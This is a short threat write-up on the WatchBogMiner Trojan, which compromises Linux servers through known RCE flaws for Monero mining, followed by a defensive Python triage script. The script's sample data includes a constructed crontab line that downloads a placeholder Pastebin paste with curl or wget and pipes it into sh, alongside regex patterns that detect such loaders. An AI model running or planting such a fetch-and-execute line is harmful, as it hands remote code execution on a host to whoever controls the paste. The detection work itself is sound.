The WatchBogMiner Trojan is attacking servers through known vulnerabilities and has taken control of tens of thousands of Linux servers for cryptocurrency mining. It exploits remote code execution vulnerabilities in server components such as Nexus Repository Manager, Supervisord and ThinkPHP, installs several kinds of persistence code on the compromised machine, and then implants a Monero mining Trojan. Judging by the computing resources the Trojan is consuming, tens of thousands of Linux servers are estimated to be under the attackers' control. The Trojan hosts its malicious code on the third-party site Pastebin to evade detection and persists through several mechanisms. It periodically pulls the mining Trojan, loads it into memory for execution, and deletes the file after startup so that no Trojan binary remains on disk (“stealth”). Like other mining Trojans, WatchBogMiner kills competing miners so that it alone consumes the server's resources.
The exploited vulnerabilities include CVE-2019-7238 – Nexus Repository Manager 3 Remote Code Execution Vulnerability, CVE-2017-11610 – Supervisord Remote Command Execution Vulnerability and CVE-2018-20062 – ThinkPHP Remote Code Execution Vulnerability.
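Two of the behaviours above leave host-side traces a defender can look for: a miner that deletes its own binary after startup shows up in `/proc/<pid>/exe` as a link target ending in `(deleted)`, and a Pastebin-backed loader typically appears as a cron or startup line that fetches from pastebin.com and pipes the result into a shell. The triage script below is an added example written for this page, not code from the original report or from any vendor tool; the process and crontab samples are constructed, the `PLACEHOLDER` paste id stands in for whatever the real campaign used, and the regular expressions are a simple heuristic rather than a complete signature.

```python
"""Host triage for two WatchBogMiner traits: deleted-on-disk executables
still running, and persistence lines that pipe Pastebin content into a shell.

Added example (not from the original report). Sample data is constructed.
"""
import os
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Heuristics for a "fetch from Pastebin and execute" one-liner.
PASTE_HOST_RE = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.IGNORECASE)
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")


@dataclass
class Finding:
    kind: str    # "deleted-exe" or "paste-loader"
    detail: str  # human-readable evidence


def flag_deleted_executables(processes: Iterable[Tuple[int, str]]) -> List[Finding]:
    """processes: (pid, exe_target) pairs, where exe_target is the readlink()
    of /proc/<pid>/exe. A running process whose binary was unlinked after
    launch (the "delete the Trojan file after startup" trick) shows a target
    ending in ' (deleted)'. Legitimate causes exist (package upgrades), so
    treat hits as leads, not verdicts."""
    findings = []
    for pid, exe in processes:
        if exe.endswith(" (deleted)"):
            findings.append(Finding("deleted-exe", f"pid {pid} runs {exe}"))
    return findings


def flag_paste_loader_lines(lines: Iterable[str]) -> List[Finding]:
    """Flag non-comment lines (e.g. from a crontab) that download from
    pastebin.com with curl/wget and pipe the output straight into sh/bash."""
    findings = []
    for n, line in enumerate(lines, 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if PASTE_HOST_RE.search(s) and FETCH_RE.search(s) and PIPE_TO_SHELL_RE.search(s):
            findings.append(Finding("paste-loader", f"line {n}: {s}"))
    return findings


def live_processes() -> List[Tuple[int, str]]:
    """Collect (pid, exe_target) from /proc on a Linux host. Entries that
    cannot be read (kernel threads, permission denied) are skipped; on a
    system without /proc the list is empty."""
    out = []
    try:
        names = os.listdir("/proc")
    except OSError:
        return out
    for name in names:
        if not name.isdigit():
            continue
        try:
            out.append((int(name), os.readlink(f"/proc/{name}/exe")))
        except OSError:
            continue
    return out


# Constructed samples: one unlinked-but-running binary and one cron line
# that fetches a paste and pipes it to sh. PLACEHOLDER is not a real paste id.
SAMPLE_PROCESSES = [
    (1, "/usr/lib/systemd/systemd"),
    (4242, "/tmp/constructed-sample (deleted)"),
    (4300, "/usr/sbin/sshd"),
]
SAMPLE_CRON = [
    "# constructed crontab for the example",
    "0 3 * * * /usr/bin/certbot renew",
    "*/10 * * * * (curl -fsSL https://pastebin.com/raw/PLACEHOLDER || "
    "wget -q -O - https://pastebin.com/raw/PLACEHOLDER) | sh",
]


def run_triage(processes, persistence_lines) -> List[Finding]:
    """Combine both checks; callers feed live_processes() and real crontab
    lines, the sample data below exercises the logic offline."""
    return flag_deleted_executables(processes) + flag_paste_loader_lines(persistence_lines)


if __name__ == "__main__":
    for f in run_triage(SAMPLE_PROCESSES, SAMPLE_CRON):
        print(f"[{f.kind}] {f.detail}")
```

On a live host, feed `live_processes()` plus the contents of the system and per-user crontabs (and any rc/systemd unit lines you collect) into `run_triage`; the deleted-executable check also catches the in-memory loading step regardless of where the code was fetched from, which is why it is worth running even if the loader has moved off Pastebin.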